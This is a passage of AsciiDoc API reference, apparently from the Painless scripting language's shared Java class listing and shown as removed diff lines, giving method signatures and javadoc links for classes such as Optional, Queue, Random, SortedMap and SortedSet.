{java11-javadoc}/java.base/java/util/SortedSet.html#subSet(java.lang.Object,java.lang.Object)[subSet](def, def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#subSet(java.lang.Object,boolean,java.lang.Object,boolean)[subSet](def, boolean, def, boolean) -* double sum() -* double sum(ToDoubleFunction) -* SortedSet 
{java11-javadoc}/java.base/java/util/SortedSet.html#tailSet(java.lang.Object)[tailSet](def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#tailSet(java.lang.Object,boolean)[tailSet](def, boolean) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NoSuchElementException]] -==== NoSuchElementException -* {java11-javadoc}/java.base/java/util/NoSuchElementException.html#()[NoSuchElementException]() -* {java11-javadoc}/java.base/java/util/NoSuchElementException.html#(java.lang.String)[NoSuchElementException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Objects]] -==== Objects -* static int {java11-javadoc}/java.base/java/util/Objects.html#compare(java.lang.Object,java.lang.Object,java.util.Comparator)[compare](def, def, Comparator) -* static boolean {java11-javadoc}/java.base/java/util/Objects.html#deepEquals(java.lang.Object,java.lang.Object)[deepEquals](Object, Object) -* static boolean {java11-javadoc}/java.base/java/util/Objects.html#equals(java.lang.Object,java.lang.Object)[equals](Object, Object) -* static int {java11-javadoc}/java.base/java/util/Objects.html#hash(java.lang.Object%5B%5D)[hash](Object[]) -* static int {java11-javadoc}/java.base/java/util/Objects.html#hashCode(java.lang.Object)[hashCode](Object) -* static boolean {java11-javadoc}/java.base/java/util/Objects.html#isNull(java.lang.Object)[isNull](Object) -* static boolean {java11-javadoc}/java.base/java/util/Objects.html#nonNull(java.lang.Object)[nonNull](Object) -* static def {java11-javadoc}/java.base/java/util/Objects.html#requireNonNull(java.lang.Object)[requireNonNull](def) -* static def {java11-javadoc}/java.base/java/util/Objects.html#requireNonNull(java.lang.Object,java.lang.String)[requireNonNull](def, null) -* static null {java11-javadoc}/java.base/java/util/Objects.html#toString(java.lang.Object)[toString](Object) -* static null {java11-javadoc}/java.base/java/util/Objects.html#toString(java.lang.Object,java.lang.String)[toString](Object, null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Observable]] -==== Observable -* {java11-javadoc}/java.base/java/util/Observable.html#()[Observable]() -* void {java11-javadoc}/java.base/java/util/Observable.html#addObserver(java.util.Observer)[addObserver](Observer) -* int {java11-javadoc}/java.base/java/util/Observable.html#countObservers()[countObservers]() -* void {java11-javadoc}/java.base/java/util/Observable.html#deleteObserver(java.util.Observer)[deleteObserver](Observer) -* void 
{java11-javadoc}/java.base/java/util/Observable.html#deleteObservers()[deleteObservers]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/Observable.html#hasChanged()[hasChanged]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/Observable.html#notifyObservers()[notifyObservers]() -* void {java11-javadoc}/java.base/java/util/Observable.html#notifyObservers(java.lang.Object)[notifyObservers](Object) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Observer]] -==== Observer -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* void {java11-javadoc}/java.base/java/util/Observer.html#update(java.util.Observable,java.lang.Object)[update](Observable, Object) - - -[[painless-api-reference-shared-Optional]] -==== Optional -* static Optional {java11-javadoc}/java.base/java/util/Optional.html#empty()[empty]() -* static Optional {java11-javadoc}/java.base/java/util/Optional.html#of(java.lang.Object)[of](def) -* static Optional {java11-javadoc}/java.base/java/util/Optional.html#ofNullable(java.lang.Object)[ofNullable](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Optional {java11-javadoc}/java.base/java/util/Optional.html#filter(java.util.function.Predicate)[filter](Predicate) -* Optional {java11-javadoc}/java.base/java/util/Optional.html#flatMap(java.util.function.Function)[flatMap](Function) -* def {java11-javadoc}/java.base/java/util/Optional.html#get()[get]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/Optional.html#ifPresent(java.util.function.Consumer)[ifPresent](Consumer) -* boolean {java11-javadoc}/java.base/java/util/Optional.html#isPresent()[isPresent]() -* Optional {java11-javadoc}/java.base/java/util/Optional.html#map(java.util.function.Function)[map](Function) -* def {java11-javadoc}/java.base/java/util/Optional.html#orElse(java.lang.Object)[orElse](def) -* def {java11-javadoc}/java.base/java/util/Optional.html#orElseGet(java.util.function.Supplier)[orElseGet](Supplier) -* def {java11-javadoc}/java.base/java/util/Optional.html#orElseThrow(java.util.function.Supplier)[orElseThrow](Supplier) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-OptionalDouble]] -==== OptionalDouble -* static OptionalDouble {java11-javadoc}/java.base/java/util/OptionalDouble.html#empty()[empty]() -* static OptionalDouble {java11-javadoc}/java.base/java/util/OptionalDouble.html#of(double)[of](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/OptionalDouble.html#getAsDouble()[getAsDouble]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/OptionalDouble.html#ifPresent(java.util.function.DoubleConsumer)[ifPresent](DoubleConsumer) -* boolean {java11-javadoc}/java.base/java/util/OptionalDouble.html#isPresent()[isPresent]() -* double 
{java11-javadoc}/java.base/java/util/OptionalDouble.html#orElse(double)[orElse](double) -* double {java11-javadoc}/java.base/java/util/OptionalDouble.html#orElseGet(java.util.function.DoubleSupplier)[orElseGet](DoubleSupplier) -* double {java11-javadoc}/java.base/java/util/OptionalDouble.html#orElseThrow(java.util.function.Supplier)[orElseThrow](Supplier) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-OptionalInt]] -==== OptionalInt -* static OptionalInt {java11-javadoc}/java.base/java/util/OptionalInt.html#empty()[empty]() -* static OptionalInt {java11-javadoc}/java.base/java/util/OptionalInt.html#of(int)[of](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/OptionalInt.html#getAsInt()[getAsInt]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/OptionalInt.html#ifPresent(java.util.function.IntConsumer)[ifPresent](IntConsumer) -* boolean {java11-javadoc}/java.base/java/util/OptionalInt.html#isPresent()[isPresent]() -* int {java11-javadoc}/java.base/java/util/OptionalInt.html#orElse(int)[orElse](int) -* int {java11-javadoc}/java.base/java/util/OptionalInt.html#orElseGet(java.util.function.IntSupplier)[orElseGet](IntSupplier) -* int {java11-javadoc}/java.base/java/util/OptionalInt.html#orElseThrow(java.util.function.Supplier)[orElseThrow](Supplier) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-OptionalLong]] -==== OptionalLong -* static OptionalLong {java11-javadoc}/java.base/java/util/OptionalLong.html#empty()[empty]() -* static OptionalLong {java11-javadoc}/java.base/java/util/OptionalLong.html#of(long)[of](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/OptionalLong.html#getAsLong()[getAsLong]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/OptionalLong.html#ifPresent(java.util.function.LongConsumer)[ifPresent](LongConsumer) -* boolean {java11-javadoc}/java.base/java/util/OptionalLong.html#isPresent()[isPresent]() -* long {java11-javadoc}/java.base/java/util/OptionalLong.html#orElse(long)[orElse](long) -* long {java11-javadoc}/java.base/java/util/OptionalLong.html#orElseGet(java.util.function.LongSupplier)[orElseGet](LongSupplier) -* long {java11-javadoc}/java.base/java/util/OptionalLong.html#orElseThrow(java.util.function.Supplier)[orElseThrow](Supplier) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PrimitiveIterator]] -==== PrimitiveIterator -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/PrimitiveIterator.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Iterator.html#next()[next]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PrimitiveIterator-OfDouble]] -==== 
PrimitiveIterator.OfDouble -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/PrimitiveIterator.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Double {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfDouble.html#next()[next]() -* double {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfDouble.html#nextDouble()[nextDouble]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PrimitiveIterator-OfInt]] -==== PrimitiveIterator.OfInt -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/PrimitiveIterator.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Integer {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfInt.html#next()[next]() -* int {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfInt.html#nextInt()[nextInt]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PrimitiveIterator-OfLong]] -==== PrimitiveIterator.OfLong -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/PrimitiveIterator.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Long {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfLong.html#next()[next]() -* long {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfLong.html#nextLong()[nextLong]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PriorityQueue]] -==== PriorityQueue -* {java11-javadoc}/java.base/java/util/PriorityQueue.html#()[PriorityQueue]() -* {java11-javadoc}/java.base/java/util/PriorityQueue.html#(java.util.Comparator)[PriorityQueue](Comparator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Queue]] -==== Queue -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean 
{java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Random]] -==== Random -* {java11-javadoc}/java.base/java/util/Random.html#()[Random]() -* {java11-javadoc}/java.base/java/util/Random.html#(long)[Random](long) -* DoubleStream {java11-javadoc}/java.base/java/util/Random.html#doubles(long)[doubles](long) -* DoubleStream {java11-javadoc}/java.base/java/util/Random.html#doubles(long,double,double)[doubles](long, double, double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* IntStream {java11-javadoc}/java.base/java/util/Random.html#ints(long)[ints](long) -* IntStream {java11-javadoc}/java.base/java/util/Random.html#ints(long,int,int)[ints](long, int, int) -* LongStream {java11-javadoc}/java.base/java/util/Random.html#longs(long)[longs](long) -* LongStream {java11-javadoc}/java.base/java/util/Random.html#longs(long,long,long)[longs](long, long, long) -* boolean {java11-javadoc}/java.base/java/util/Random.html#nextBoolean()[nextBoolean]() -* void {java11-javadoc}/java.base/java/util/Random.html#nextBytes(byte%5B%5D)[nextBytes](byte[]) -* double {java11-javadoc}/java.base/java/util/Random.html#nextDouble()[nextDouble]() -* float {java11-javadoc}/java.base/java/util/Random.html#nextFloat()[nextFloat]() -* double {java11-javadoc}/java.base/java/util/Random.html#nextGaussian()[nextGaussian]() -* int {java11-javadoc}/java.base/java/util/Random.html#nextInt()[nextInt]() -* int {java11-javadoc}/java.base/java/util/Random.html#nextInt(int)[nextInt](int) -* long {java11-javadoc}/java.base/java/util/Random.html#nextLong()[nextLong]() -* void {java11-javadoc}/java.base/java/util/Random.html#setSeed(long)[setSeed](long) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-RandomAccess]] -==== RandomAccess -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Set]] -==== Set -* boolean 
{java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-SimpleTimeZone]] -==== SimpleTimeZone -* static int {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#STANDARD_TIME[STANDARD_TIME] -* static int {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#UTC_TIME[UTC_TIME] -* static int {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#WALL_TIME[WALL_TIME] -* {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#(int,java.lang.String,int,int,int,int,int,int,int,int)[SimpleTimeZone](int, null, int, int, int, int, int, int, int, int) -* {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#(int,java.lang.String,int,int,int,int,int,int,int,int,int)[SimpleTimeZone](int, null, int, int, int, int, int, int, int, int, int) -* {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#(int,java.lang.String,int,int,int,int,int,int,int,int,int,int,int)[SimpleTimeZone](int, null, int, int, int, int, int, int, int, int, int, int, int) -* {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#(int,java.lang.String)[SimpleTimeZone](int, null) -* def {java11-javadoc}/java.base/java/util/TimeZone.html#clone()[clone]() 
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#getDSTSavings()[getDSTSavings]() -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName()[getDisplayName]() -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(boolean,int)[getDisplayName](boolean, int) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(boolean,int,java.util.Locale)[getDisplayName](boolean, int, Locale) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getID()[getID]() -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getOffset(long)[getOffset](long) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getOffset(int,int,int,int,int,int)[getOffset](int, int, int, int, int, int) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getRawOffset()[getRawOffset]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#hasSameRules(java.util.TimeZone)[hasSameRules](TimeZone) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#inDaylightTime(java.util.Date)[inDaylightTime](Date) -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#observesDaylightTime()[observesDaylightTime]() -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setDSTSavings(int)[setDSTSavings](int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setEndRule(int,int,int)[setEndRule](int, int, int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setEndRule(int,int,int,int)[setEndRule](int, int, int, int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setEndRule(int,int,int,int,boolean)[setEndRule](int, int, int, int, boolean) -* void {java11-javadoc}/java.base/java/util/TimeZone.html#setRawOffset(int)[setRawOffset](int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setStartRule(int,int,int)[setStartRule](int, int, int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setStartRule(int,int,int,int)[setStartRule](int, int, int, int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setStartRule(int,int,int,int,boolean)[setStartRule](int, int, int, int, boolean) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setStartYear(int)[setStartYear](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* ZoneId {java11-javadoc}/java.base/java/util/TimeZone.html#toZoneId()[toZoneId]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#useDaylightTime()[useDaylightTime]() - - -[[painless-api-reference-shared-SortedMap]] -==== SortedMap -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* Comparator {java11-javadoc}/java.base/java/util/SortedMap.html#comparator()[comparator]() -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) 
-* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* def {java11-javadoc}/java.base/java/util/SortedMap.html#firstKey()[firstKey]() -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#headMap(java.lang.Object)[headMap](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#lastKey()[lastKey]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#subMap(java.lang.Object,java.lang.Object)[subMap](def, def) -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#tailMap(java.lang.Object)[tailMap](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-SortedSet]] -==== SortedSet -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) 